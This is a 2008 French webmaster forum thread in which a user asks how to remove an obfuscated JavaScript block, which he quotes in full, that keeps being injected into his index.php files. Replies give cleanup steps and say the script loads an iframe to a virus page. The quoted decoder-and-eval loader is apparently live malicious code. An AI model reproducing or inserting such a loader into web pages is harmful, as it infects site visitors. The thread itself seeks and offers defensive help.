moonwar Posté 17 Novembre 2008 Posté 17 Novembre 2008 Salitation, Ca fait un bon moment, j'ai remarqué un code qui s'ajoute a tout mes fichiers index.php. Je ne connais ni l'origine ni la raison. J'ai aussi remarqué que ce code vient juste après la balise <body> ou juste avant la balise </body> <script language=JavaScript> function jbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,30,39,22,1,14,38,60,18,9,0,0,0,0,0,0,58,48,35,28,33,55,56,41,23,6,37,3,45,46,42,24,12,47,17,15,57,54,31,40,20,19,25,0,0,0,0,0,0,4,16,32,52,7,10,11,61,59,8,43,44,51,5,2,34,29,62,36,13,50,27,26,21,53,49);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(208^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}jbnb25('26kQdriGrSfGz8wGBUrhXrkQy10_AT_drilJUvLr8N02fwMs3grEm1MUfwlh3g7rIvQyU5_AT_2Y1LASNWmUM7F8fGcNr00V1ld8vMs6iQr_AT_VMrwiQ0Y_AT_0QV0rqIgGF_AT_QW03NQdpV2z8fMrgwlr8iQhpVr_AT_YMTJHMTTQ0hWV5Ty10rEgS726gLspvisHMFABvLT1gMsU1FcS57B8wN73viuYvMBofQz6N_AT_rrkQyfQil0VMUfwlh3kiE2S') </script> Comment s'en debarasser et est-ce-que vous avez une idée sur la faille sécuritaire que ce code utilise. Merci pour votre aide.
f_trt Posté 17 Novembre 2008 Posté 17 Novembre 2008 Ce code est ajouté à la volée par ton hebergeur ? pour savoir le code est-il présent si tu recupère le source via ftp ? En attendant deux précautions à prendre : 1/ Effectuer une sauvegarde complète de ton hebergement (pour recherche du problème plus tard) 2/ S'assurer que ta machine (celle qui te sert à télécharger ton site) est propre passe un anti-virus récent + un anti spy 3/ Une fois que tu es sûre que ta machine est propre change ton mot de passe ftp de ton hebergement 4/ Laisse le minimum sur le serveur quitte à tout effacer et retélécharger depuis ton pc propre Maintenant que tout doit être ok il te faut trouver ce qui se passe ou s'est passé 6/ Tu étudies les log serveur pour mettre le doigt sur des scripts suspect ou des appels de page bizarre 7/ Tu rapproche ton log de ce que tu as sauvegarder pour trouver le problème A+
captain_torche Posté 17 Novembre 2008 Posté 17 Novembre 2008 Si j'en crois ce sujet, le JavaScript ainsi inséré affiche une iframe vers une page contenant un virus; il est donc indispensable que tu t'en débarrasses au plus vite.
Sujets conseillés
Veuillez vous connecter pour commenter
Vous pourrez laisser un commentaire après vous êtes connecté.
Connectez-vous maintenant